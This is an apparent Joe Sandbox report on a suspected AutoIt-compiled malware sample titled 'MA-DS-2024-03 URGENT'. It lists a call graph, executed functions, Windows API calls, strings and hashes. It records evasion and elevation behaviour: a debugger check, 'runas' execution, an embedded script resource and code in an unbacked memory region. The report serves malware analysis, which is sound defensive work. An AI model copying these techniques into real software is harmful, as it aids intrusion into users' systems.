111950->111952 111953 4057f6 67 API calls 111951->111953 111954 46d0de 111952->111954 111955 46d1fb 111953->111955 111956 40459b 59 API calls 111954->111956 111957 46d233 111955->111957 111958 46d1ff GetLastError 111955->111958 111959 46d0f3 111956->111959 111962 46d295 111957->111962 111963 46d25e 111957->111963 111960 46d218 111958->111960 111961 407b2e 59 API calls 111959->111961 111973 46d188 Mailbox 111960->111973 112125 4058ba CloseHandle 111960->112125 111964 46d126 111961->111964 111967 420db6 Mailbox 59 API calls 111962->111967 111965 420db6 Mailbox 59 API calls 111963->111965 111966 46d178 111964->111966 111972 463c37 3 API calls 111964->111972 111969 46d263 111965->111969 112123 409b3c 59 API calls 111966->112123 111968 46d29a 111967->111968 111968->111973 111976 407667 59 API calls 111968->111976 111974 46d274 111969->111974 111977 407667 59 API calls 111969->111977 111975 46d136 111972->111975 111973->111890 112126 47fbce 59 API calls 2 library calls 111974->112126 111975->111966 111978 46d13a 111975->111978 111976->111973 111977->111974 111979 407de1 59 API calls 111978->111979 111981 46d147 111979->111981 112122 463a2a 63 API calls Mailbox 111981->112122 111983->111942 111983->111973 111984 46d150 Mailbox 111984->111966 111986 409a98 59 API calls 111985->111986 111987 411fdb 111986->111987 111989 420db6 Mailbox 59 API calls 111987->111989 111991 446585 111987->111991 111990 411ff4 111989->111990 111993 412004 111990->111993 112148 4057a6 60 API calls Mailbox 111990->112148 111992 412029 111991->111992 112151 46f574 59 API calls 111991->112151 112001 412036 111992->112001 112152 409b3c 59 API calls 111992->112152 111995 409837 84 API calls 111993->111995 111996 412012 111995->111996 111998 4057f6 67 API calls 111996->111998 112004 412021 111998->112004 111999 4465cd 112000 4465d5 111999->112000 111999->112001 112153 409b3c 59 API calls 112000->112153 112002 405cdf 2 API calls 112001->112002 112006 41203d 112002->112006 112004->111991 112004->111992 112150 4058ba CloseHandle 112004->112150 112007 4465e7 112006->112007 112008 412057 112006->112008 112009 420db6 Mailbox 59 API calls 112007->112009 112010 407667 59 API calls 112008->112010 112011 4465ed 112009->112011 112012 41205f 112010->112012 112013 446601 112011->112013 112154 405850 ReadFile SetFilePointerEx 112011->112154 112127 405572 112012->112127 112016 4676c4 59 API calls 112013->112016 112019 446605 _memmove 112013->112019 112016->112019 112017 41206e 112017->112019 112142 409a3c 112017->112142 112020 412082 Mailbox 112021 4120bc 112020->112021 112022 405c6f CloseHandle 112020->112022 112021->111890 112023 4120b0 112022->112023 112023->112021 112149 4058ba CloseHandle 112023->112149 112026 407667 59 API calls 112025->112026 112027 482158 112026->112027 112028 409837 84 API calls 112027->112028 112029 482167 112028->112029 112030 407a16 59 API calls 112029->112030 112031 48217a 112030->112031 112032 409837 84 API calls 112031->112032 112033 482187 112032->112033 112034 4821a1 112033->112034 112035 482215 112033->112035 112158 409b3c 59 API calls 112034->112158 112037 409837 84 API calls 112035->112037 112039 48221a 112037->112039 112038 4821a6 112040 482204 112038->112040 112043 4821bd 112038->112043 112041 482228 112039->112041 112042 482246 112039->112042 112046 409a98 59 API calls 112040->112046 112044 409a98 59 API calls 112041->112044 112045 48225b 112042->112045 112159 409b3c 59 API calls 112042->112159 112047 40784b 59 API calls 112043->112047 112060 482211 Mailbox 112044->112060 112049 482270 112045->112049 112160 409b3c 59 API calls 112045->112160 112046->112060 112051 4821ca 112047->112051 112050 407f77 59 API calls 112049->112050 112053 48228a 112050->112053 112054 407b2e 59 API calls 112051->112054 112161 45f401 62 API calls Mailbox 112053->112161 112056 4821d8 112054->112056 112057 40784b 59 API calls 112056->112057 112058 4821f1 112057->112058 112059 407b2e 59 API calls 112058->112059 112062 4821ff 112059->112062 112060->111890 112061 409a3c 59 API calls 112061->112060 112062->112061 112064 47cadd 130 API calls 112063->112064 112065 47df33 112064->112065 112065->111890 112067 407667 59 API calls 112066->112067 112068 47c2f4 112067->112068 112069 407667 59 API calls 112068->112069 112070 47c2fc 112069->112070 112071 407667 59 API calls 112070->112071 112072 47c304 112071->112072 112073 409837 84 API calls 112072->112073 112097 47c312 112073->112097 112074 407924 59 API calls 112074->112097 112075 407bcc 59 API calls 112075->112097 112076 47c4fb 112077 47c528 Mailbox 112076->112077 112079 409a3c 59 API calls 112076->112079 112077->111890 112078 47c4e2 112082 407cab 59 API calls 112078->112082 112079->112077 112080 47c4fd 112083 407cab 59 API calls 112080->112083 112081 408047 59 API calls 112081->112097 112084 47c4ef 112082->112084 112085 47c50c 112083->112085 112087 407b2e 59 API calls 112084->112087 112088 407b2e 59 API calls 112085->112088 112086 407e4f 59 API calls 112090 47c3a9 CharUpperBuffW 112086->112090 112087->112076 112088->112076 112089 407e4f 59 API calls 112091 47c469 CharUpperBuffW 112089->112091 112162 40843a 68 API calls 112090->112162 112093 40c5a7 69 API calls 112091->112093 112093->112097 112094 407cab 59 API calls 112094->112097 112095 409837 84 API calls 112095->112097 112096 407b2e 59 API calls 112096->112097 112097->112074 112097->112075 112097->112076 112097->112077 112097->112078 112097->112080 112097->112081 112097->112086 112097->112089 112097->112094 112097->112095 112097->112096 112099 467962 112098->112099 112100 420db6 Mailbox 59 API calls 112099->112100 112101 467970 112100->112101 112102 46797e 112101->112102 112103 407667 59 API calls 112101->112103 112102->111890 112103->112102 112163 4560c0 112104->112163 112106 45618c 112106->111890 112107->111915 112108->111915 112109->111890 112110->111929 112111->111919 112112->111892 112113->111890 112114->111902 112115->111926 112116->111926 112117->111926 112118->111909 112119->111894 112120->111909 112121->111940 112122->111984 112123->111983 112124->111946 112125->111973 112126->111973 112128 4055a2 112127->112128 112129 40557d 112127->112129 112130 407d8c 59 API calls 112128->112130 112129->112128 112132 40558c 112129->112132 112138 46325e 112130->112138 112133 405ab8 59 API calls 112132->112133 112136 46337e 112133->112136 112135 46328d 112135->112017 112137 4054d2 61 API calls 112136->112137 112139 46338c 112137->112139 112138->112135 112155 4631fa ReadFile SetFilePointerEx 112138->112155 112156 407924 59 API calls 2 library calls 112138->112156 112141 46339c Mailbox 112139->112141 112157 4077da 61 API calls Mailbox 112139->112157 112141->112017 112143 409a87 112142->112143 112144 409a48 112142->112144 112145 408047 59 API calls 112143->112145 112147 420db6 Mailbox 59 API calls 112144->112147 112146 409a5b 112145->112146 112146->112020 112147->112146 112148->111993 112149->112021 112150->111991 112151->111991 112152->111999 112153->112006 112154->112013 112155->112138 112156->112138 112157->112141 112158->112038 112159->112045 112160->112049 112161->112062 112162->112097 112164 4560e8 112163->112164 112165 4560cb 112163->112165 112164->112106 112165->112164 112167 4560ab 59 API calls Mailbox 112165->112167 112167->112165

                                                        Executed Functions

                                                        Function 0169CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 417COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d$w
                                                        • API String ID: 0-2400632791
                                                        • Opcode ID: d5a786b87fb6df7fdebc00072415fb60341e2b7986f10a07198d8314986f9598
                                                        • Instruction ID: add0354c414c3d509daba610adcdb77f9f3f3ffed35e8a39f517a4a8252611b9
                                                        • Opcode Fuzzy Hash: d5a786b87fb6df7fdebc00072415fb60341e2b7986f10a07198d8314986f9598
                                                        • Instruction Fuzzy Hash: 6CC14971A0C380AFEF374A2C9C58F393E6C5B41AA0F8C019AE746CA3F3D3655905D256
                                                        Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                        • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                          • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                        • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                          • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                          • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                          • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                          • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                          • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                          • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                          • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                          • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                          • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                          • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                          • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                          • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                          • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                        • API String ID: 529118366-2806069697
                                                        • Opcode ID: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                        • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                        • Opcode Fuzzy Hash: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                        • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D
                                                        Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2066 4049a0-404a00 call 407667 GetVersionExW call 407bcc 2071 404a06 2066->2071 2072 404b0b-404b0d 2066->2072 2074 404a09-404a0e 2071->2074 2073 43d767-43d773 2072->2073 2075 43d774-43d778 2073->2075 2076 404b12-404b13 2074->2076 2077 404a14 2074->2077 2079 43d77b-43d787 2075->2079 2080 43d77a 2075->2080 2078 404a15-404a4c call 407d2c call 407726 2076->2078 2077->2078 2088 404a52-404a53 2078->2088 2089 43d864-43d867 2078->2089 2079->2075 2082 43d789-43d78e 2079->2082 2080->2079 2082->2074 2084 43d794-43d79b 2082->2084 2084->2073 2086 43d79d 2084->2086 2090 43d7a2-43d7a5 2086->2090 2088->2090 2091 404a59-404a64 2088->2091 2092 43d880-43d884 2089->2092 2093 43d869 2089->2093 2094 404a93-404aaa GetCurrentProcess IsWow64Process 2090->2094 2095 43d7ab-43d7c9 2090->2095 2096 43d7ea-43d7f0 2091->2096 2097 404a6a-404a6c 2091->2097 2100 43d886-43d88f 2092->2100 2101 43d86f-43d878 2092->2101 2098 43d86c 2093->2098 2102 404aac 2094->2102 2103 404aaf-404ac0 2094->2103 2095->2094 2099 43d7cf-43d7d5 2095->2099 2108 43d7f2-43d7f5 2096->2108 2109 43d7fa-43d800 2096->2109 2104 404a72-404a75 2097->2104 2105 43d805-43d811 2097->2105 2098->2101 2106 43d7d7-43d7da 2099->2106 2107 43d7df-43d7e5 2099->2107 2100->2098 2110 43d891-43d894 2100->2110 2101->2092 2102->2103 2111 404ac2-404ad2 call 404b37 2103->2111 2112 404b2b-404b35 GetSystemInfo 2103->2112 2113 43d831-43d834 2104->2113 2114 404a7b-404a8a 2104->2114 2116 43d813-43d816 2105->2116 2117 43d81b-43d821 2105->2117 2106->2094 2107->2094 2108->2094 2109->2094 2110->2101 2123 404ad4-404ae1 call 404b37 2111->2123 2124 404b1f-404b29 GetSystemInfo 2111->2124 2115 404af8-404b08 2112->2115 2113->2094 2122 43d83a-43d84f 2113->2122 2119 404a90 2114->2119 2120 43d826-43d82c 2114->2120 2116->2094 2117->2094 2119->2094 2120->2094 2125 43d851-43d854 2122->2125 2126 43d859-43d85f 2122->2126 2131 404ae3-404ae7 GetNativeSystemInfo 2123->2131 2132 404b18-404b1d 2123->2132 2127 404ae9-404aed 2124->2127 2125->2094 2126->2094 2127->2115 2129 404aef-404af2 FreeLibrary 2127->2129 2129->2115 2131->2127 2132->2131
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                        • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                        • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                        • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                        • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E
                                                        Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2133 404e89-404ea1 CreateStreamOnHGlobal 2134 404ec1-404ec6 2133->2134 2135 404ea3-404eba FindResourceExW 2133->2135 2136 43d933-43d942 LoadResource 2135->2136 2137 404ec0 2135->2137 2136->2137 2138 43d948-43d956 SizeofResource 2136->2138 2137->2134 2138->2137 2139 43d95c-43d967 LockResource 2138->2139 2139->2137 2140 43d96d-43d975 2139->2140 2141 43d979-43d98b 2140->2141 2141->2137
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                        • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                        • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                        • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                        • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                        • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                        Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: pbL$%I
                                                        • API String ID: 3964851224-1578263234
                                                        • Opcode ID: c37b66ce17b1354f57705c901a6f2f94cef4c8c8aaee3654f7ad124679c9c54b
                                                        • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                        • Opcode Fuzzy Hash: c37b66ce17b1354f57705c901a6f2f94cef4c8c8aaee3654f7ad124679c9c54b
                                                        • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                        Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                        • API String ID: 0-2838938394
                                                        • Opcode ID: 320f442f758ecc80b3ddca5034ac15bb90a7fe00f9ba275652cca2b21843bf7d
                                                        • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                        • Opcode Fuzzy Hash: 320f442f758ecc80b3ddca5034ac15bb90a7fe00f9ba275652cca2b21843bf7d
                                                        • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                        Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                        • FindClose.KERNEL32(00000000), ref: 0046448B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                        • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                                        • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                        • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                                        Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                        • timeGetTime.WINMM ref: 00410D16
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                        • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                        • DestroyWindow.USER32 ref: 00410F06
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                        • TranslateMessage.USER32(?), ref: 00445C60
                                                        • DispatchMessageW.USER32(?), ref: 00445C6E
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                        • API String ID: 4212290369-1082885916
                                                        • Opcode ID: 618afc13f6544c439f6a0b9aa5364fceb3cd83de4d4869231364c61163df425f
                                                        • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                                        • Opcode Fuzzy Hash: 618afc13f6544c439f6a0b9aa5364fceb3cd83de4d4869231364c61163df425f
                                                        • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                                        Function 01698550 Relevance: 20.0, APIs: 13, Instructions: 506COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID:
                                                        • API String ID: 1452528299-0
                                                        • Opcode ID: d2c8b1d5232d0faae8d46e976c38147c8deee6602559387c67272e045cd2d534
                                                        • Instruction ID: e3c8eab8f43b235238a056416cb8f5b486e12f549aba60f080e6c0fe9d809eeb
                                                        • Opcode Fuzzy Hash: d2c8b1d5232d0faae8d46e976c38147c8deee6602559387c67272e045cd2d534
                                                        • Instruction Fuzzy Hash: 81E1376291C34D9BEF374B6C4C087353E6C6B63660F4C468AE756DB3E7D3258809C626
                                                        Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
